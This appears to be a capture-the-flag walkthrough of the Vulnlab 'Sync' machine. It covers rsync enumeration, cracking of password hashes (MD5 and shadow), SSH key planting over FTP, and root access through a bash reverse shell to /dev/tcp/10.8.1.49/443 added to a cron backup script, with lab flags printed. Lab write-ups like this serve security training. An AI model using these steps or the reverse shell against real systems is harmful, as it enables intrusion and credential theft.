Vulnlab Linux Easy: Sync
Sync is an Easy rated Linux machine on Vulnlab.
Vulnlab Linux Easy: Sync
Nmap Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p- 10.10.113.159
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024-01-30 15:18 CET
Nmap scan report for 10.10.113.159
Host is up (0.033s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 c8:db:15:da:da:b6:be:5c:2a:9c:1a:4d:a0:39:cd:a2 (ECDSA)
|_ 256 b1:4a:e4:5a:fc:83:1a:0c:36:07:45:75:72:43:f7:bb (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Login
|_http-server-header: Apache/2.4.52 (Ubuntu)
873/tcp open rsync (protocol version 31)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 42.61 seconds
Enumerate RSYNC (Port 873)
List shares using rsync.
1
2
3
┌──(kali㉿kali)-[~]
└─$ rsync -av --list-only rsync://10.10.113.159:873/
httpd web backup
We can’t seem to enumerate the web backup folder.
1
2
3
4
┌──(kali㉿kali)-[~]
└─$ rsync -av --list-only 'rsync://10.10.113.159:873/web backup/'
@ERROR: Unknown module 'web backup'
rsync error: error starting client-server protocol (code 5) at main.c(1863) [Receiver=3.2.7]
We can however access the httpd folder.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~]
└─$ rsync -av --list-only 'rsync://10.10.113.159:873/httpd'
receiving incremental file list
drwxr-xr-x 4,096 2023/04/20 21:50:04 .
drwxr-xr-x 4,096 2023/04/20 22:13:22 db
-rw-r--r-- 12,288 2023/04/20 21:50:42 db/site.db
drwxr-xr-x 4,096 2023/04/20 21:50:50 migrate
drwxr-xr-x 4,096 2023/04/20 22:13:15 www
-rw-r--r-- 1,722 2023/04/20 22:02:54 www/dashboard.php
-rw-r--r-- 2,315 2023/04/20 22:09:10 www/index.php
-rw-r--r-- 101 2023/04/20 22:03:08 www/logout.php
sent 23 bytes received 228 bytes 167.33 bytes/sec
total size is 16,426 speedup is 65.44
We can retrieve all the files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~]
└─$ rsync -av 'rsync://10.10.113.159:873/httpd' ./httpd
receiving incremental file list
created directory ./httpd
./
db/
db/site.db
migrate/
www/
www/dashboard.php
www/index.php
www/logout.php
sent 123 bytes received 16,850 bytes 11,315.33 bytes/sec
total size is 16,426 speedup is 0.97
Looks like we don’t have write access.
1
2
3
4
5
6
┌──(kali㉿kali)-[~/httpd]
└─$ rsync -av ../Important.txt 'rsync://10.10.113.159:873/httpd'
sending incremental file list
ERROR: module is read only
rsync error: syntax or usage error (code 1) at main.c(1150) [Receiver=3.2.7]
rsync: [sender] read error: Connection reset by peer (104)
In the db folder we find a site.db file. We can retrieve the contents of the db file using sqlite3.
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~/httpd/db]
└─$ sqlite3 site.db
SQLite version 3.44.0 2023-11-01 11:23:50
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> select * from users;
1|admin|7658a2741c9df3a97c819584db6e6b3c
2|triss|a0de4d7f81676c3ea9eabcadfd2536f6
In the index.php page we can verify how passwords are hashed.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
session_start();
$secure = "6c4972f3717a5e881e282ad3105de01e";
if (isset($_SESSION['username'])) {
header('Location: dashboard.php');
exit();
}
if (isset($_POST['username']) && isset($_POST['password'])) {
$username = $_POST['username'];
$password = $_POST['password'];
$hash = md5("$secure|$username|$password");
$db = new SQLite3('../db/site.db');
$result = $db->query("SELECT * FROM users WHERE username = '$username' AND password= '$hash'");
$row = $result->fetchArray(SQLITE3_ASSOC);
if ($row) {
$_SESSION['username'] = $row['username'];
header('Location: dashboard.php');
exit();
} else {
$error_message = 'Invalid username or password.';
}
}
In order to crack the password, we will write a Python script.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#!/usr/bin/env python3
import hashlib
secure = "6c4972f3717a5e881e282ad3105de01e"
username = "triss"
triss_hash = "a0de4d7f81676c3ea9eabcadfd2536f6"
with open('/usr/share/wordlists/rockyou.txt', 'r') as file:
for line in file:
line = line.rstrip('\\n')
to_hash = f"{secure}|{username}|{line}"
hash = hashlib.md5(to_hash.encode("utf-8")).hexdigest()
if hash == triss_hash:
print("Triss's password is: " + line)
exit()
1
Output: Triss's password is: gerald
Gain shell
SSH denied.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ ssh triss@10.10.113.159
The authenticity of host '10.10.113.159 (10.10.113.159)' can't be established.
ED25519 key fingerprint is SHA256:PfiTQiupGIW4nnLL5GrTOIUSd6IGaZQoq7QDiRsBlRc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.113.159' (ED25519) to the list of known hosts.
triss@10.10.113.159: Permission denied (publickey).
We are able to login via FTP however.
1
2
3
4
5
6
7
8
9
┌──(kali㉿kali)-[~]
└─$ ftp triss@10.10.113.159
Connected to 10.10.113.159.
220 (vsFTPd 3.0.5)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
Looks like we are in the home directory of the triss user.
1
2
3
4
5
6
7
8
9
10
ftp> ls -al
229 Entering Extended Passive Mode (|||10793|)
150 Here comes the directory listing.
drwxr-x--- 2 1003 1003 4096 Apr 21 2023 .
drwxr-x--- 2 1003 1003 4096 Apr 21 2023 ..
lrwxrwxrwx 1 0 0 9 Apr 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 1003 1003 220 Apr 19 2023 .bash_logout
-rw-r--r-- 1 1003 1003 3771 Apr 19 2023 .bashrc
-rw-r--r-- 1 1003 1003 807 Apr 19 2023 .profile
226 Directory send OK.
Since we have write permissions, we can put our SSH public key into the .ssh folder (and rename the file to be authorized keys). Start by generating our SSH key and creating the authorized keys file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~]
└─$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:pwCdbFWdaDhhexu5pSgUvLnP60b6FmrI/LfGA14iJmc kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| .. ++.o . |
| o.=o.o.o |
| . *o.o+ . |
| +o o * |
| o.S = |
| . E +o+o |
| B + @.. |
| + = X |
| o.B=+ |
+----[SHA256]-----+
┌──(kali㉿kali)-[~]
└─$ cp .ssh/id_rsa.pub authorized_keys
Now we can create the .ssh folder and put the authorized keys file in there.
1
2
3
4
5
6
7
8
9
10
ftp> mkdir .ssh
257 "/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys
local: authorized_keys remote: authorized_keys
229 Entering Extended Passive Mode (|||57014|)
150 Ok to send data.
100% |****************************************************************************************************************| 563 2.68 MiB/s 00:00 ETA
226 Transfer complete.
Time to SSH as triss.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(kali㉿kali)-[~]
└─$ ssh triss@10.10.113.159
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.19.0-1023-aws x86_64)
* Documentation: <https://help.ubuntu.com>
* Management: <https://landscape.canonical.com>
* Support: <https://ubuntu.com/advantage>
System information as of Tue Jan 30 15:18:00 UTC 2024
System load: 0.0 Processes: 97
Usage of /: 28.0% of 7.57GB Users logged in: 0
Memory usage: 21% IPv4 address for eth0: 10.10.113.159
Swap usage: 0%
* Ubuntu Pro delivers the most comprehensive open source security and
compliance features.
<https://ubuntu.com/aws/pro>
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
<https://ubuntu.com/pro>
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See <https://ubuntu.com/esm> or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
triss@ip-10-10-200-238:~$ id
uid=1003(triss) gid=1003(triss) groups=1003(triss)
Lateral movement
Found a backup folder that contains a ton of backups, let’s transfer one of them onto our system.
1
2
3
┌──(kali㉿kali)-[~]
└─$ scp triss@10.10.113.159:/backup/1706628241.zip .
1706628241.zip 100% 5899 101.9KB/s 00:00
Looks like the passwd and shadow file are both present.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿kali)-[~]
└─$ unzip 1706628241.zip
Archive: 1706628241.zip
creating: tmp/backup/
inflating: tmp/backup/rsyncd.conf
creating: tmp/backup/httpd/
creating: tmp/backup/httpd/www/
inflating: tmp/backup/httpd/www/dashboard.php
inflating: tmp/backup/httpd/www/logout.php
inflating: tmp/backup/httpd/www/index.php
creating: tmp/backup/httpd/migrate/
creating: tmp/backup/httpd/db/
inflating: tmp/backup/httpd/db/site.db
inflating: tmp/backup/passwd
inflating: tmp/backup/shadow
Use unhash to create a crackable file.
1
2
┌──(kali㉿kali)-[~/tmp/backup]
└─$ unshadow passwd shadow > crack
Now use JohnTheRipper to crack the hashes.
1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/tmp/backup]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt crack --format=crypt
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sakura (sa)
gerald (jennifer)
gerald (triss)
Switch to the jennifer user.
1
2
3
4
triss@ip-10-10-200-238:~$ su jennifer
Password:
jennifer@ip-10-10-200-238:/home/triss$ id
uid=1004(jennifer) gid=1004(jennifer) groups=1004(jennifer)
User flag: VL{bcf845cf94864fbba7e016d9fcd3a2db}
1
2
jennifer@ip-10-10-200-238:~$ cat user.txt
VL{bcf845cf94864fbba7e016d9fcd3a2db}
Privilege Escalation
Linpeas reveales a backup.sh script.
1
2
3
4
════════════════════════════╣ Other Interesting Files
╔══════════╣ .sh files in path
╚ <https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path>
/usr/local/bin/backup.sh
Looks like the sa user can modify this script.
1
2
3
4
5
jennifer@ip-10-10-200-238:/usr/local/bin$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Apr 19 2023 .
drwxr-xr-x 10 root root 4096 Mar 25 2023 ..
-rwxr-xr-x 1 sa sa 211 Apr 19 2023 backup.sh
Switch to the sa user (password: sakura).
1
2
3
4
jennifer@ip-10-10-200-238:/usr/local/bin$ su sa
Password:
sa@ip-10-10-200-238:/usr/local/bin$ id
uid=1001(sa) gid=1001(sa) groups=1001(sa)
Now add a reverse shell to the end of the backup script.
1
2
3
4
5
6
7
8
9
10
11
sa@ip-10-10-200-238:/usr/local/bin$ cat backup.sh
#!/bin/bash
mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
bash -c 'bash -i >& /dev/tcp/10.8.1.49/443 0>&1'
After 2 minutes you should get a call back as root.
1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.8.1.49] from (UNKNOWN) [10.10.113.159] 37356
bash: cannot set terminal process group (59531): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-200-238:~# id
uid=0(root) gid=0(root) groups=0(root)
Root shell: VL{1ce8506d2bec0abb03177353db237e1b}
1
2
root@ip-10-10-200-238:~# cat root.txt
VL{1ce8506d2bec0abb03177353db237e1b}
This post is licensed under CC BY 4.0 by the author.